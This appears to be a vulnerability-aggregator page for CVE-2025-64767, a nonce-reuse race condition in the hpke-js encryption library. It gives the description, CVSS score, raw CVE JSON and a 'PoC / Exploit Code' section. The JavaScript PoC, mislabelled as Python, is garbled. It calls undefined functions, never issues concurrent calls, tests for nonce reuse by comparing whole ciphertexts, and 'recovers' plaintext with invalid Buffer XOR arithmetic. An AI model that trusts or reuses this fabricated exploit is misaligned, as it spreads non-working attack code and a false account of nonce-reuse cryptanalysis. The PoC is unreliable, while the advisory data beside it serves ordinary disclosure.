Security Vulnerability Report
中文
CVE-2025-64767 CVSS 9.1 CRITICAL

CVE-2025-64767

Published: 2025-11-21 19:16:03
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

hpke-js is a Hybrid Public Key Encryption (HPKE) module built on top of Web Cryptography API. Prior to version 1.7.5, the public SenderContext Seal() API has a race condition which allows for the same AEAD nonce to be re-used for multiple Seal() calls. This can lead to complete loss of Confidentiality and Integrity of the produced messages. This issue has been patched in version 1.7.5.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

hpke-js < 1.7.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64767 PoC - Nonce Reuse in hpke-js SenderContext.Seal() // Race condition demonstration const { setupSenderContext, CipherSuite, AES_128_GCM } = require('hpke-js'); async function exploitNonceReuse() { const suite = new CipherSuite({ kem: 'X25519', kdf: 'HKDF-SHA256', aead: AES_128_GCM }); // Generate sender context const sender = await suite.createSenderContext({ recipientPublicKey: generateKeyPair().publicKey }); const pt1 = Buffer.from('Message 1'); const pt2 = Buffer.from('Message 2'); // Race condition: concurrent Seal() calls may reuse nonce const [ct1, sealer1] = await sender.seal(pt1); const [ct2, sealer2] = await sender.seal(pt2); // If nonce reused, keystream is identical // Attack: ct1 XOR ct2 = pt1 XOR pt2 (plaintext XOR plaintext) const xorResult = Buffer.from(ct1).compare(Buffer.from(ct2)); console.log('Nonce reuse detected:', xorResult === 0); // Full plaintext recovery via known-plaintext attack if (xorResult === 0) { const recovered_pt2 = Buffer.from(ct1).slice(0, 12) ^ Buffer.from(pt1) ^ Buffer.from(pt2); console.log('Plaintext 2 recovered:', recovered_pt2.toString()); } } exploitNonceReuse().catch(console.error);

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64767", "sourceIdentifier": "[email protected]", "published": "2025-11-21T19:16:03.497", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "hpke-js is a Hybrid Public Key Encryption (HPKE) module built on top of Web Cryptography API. Prior to version 1.7.5, the public SenderContext Seal() API has a race condition which allows for the same AEAD nonce to be re-used for multiple Seal() calls. This can lead to complete loss of Confidentiality and Integrity of the produced messages. This issue has been patched in version 1.7.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-323"}]}], "references": [{"url": "https://github.com/dajiaji/hpke-js/blob/b7fd3592c7c08660c98289d67c6bb7f891af75c4/packages/core/src/senderContext.ts#L22-L34", "source": "[email protected]"}, {"url": "https://github.com/dajiaji/hpke-js/commit/94a767c9b9f37ce48d5cd86f7017d8cacd294aaf", "source": "[email protected]"}, {"url": "https://github.com/dajiaji/hpke-js/security/advisories/GHSA-73g8-5h73-26h4", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.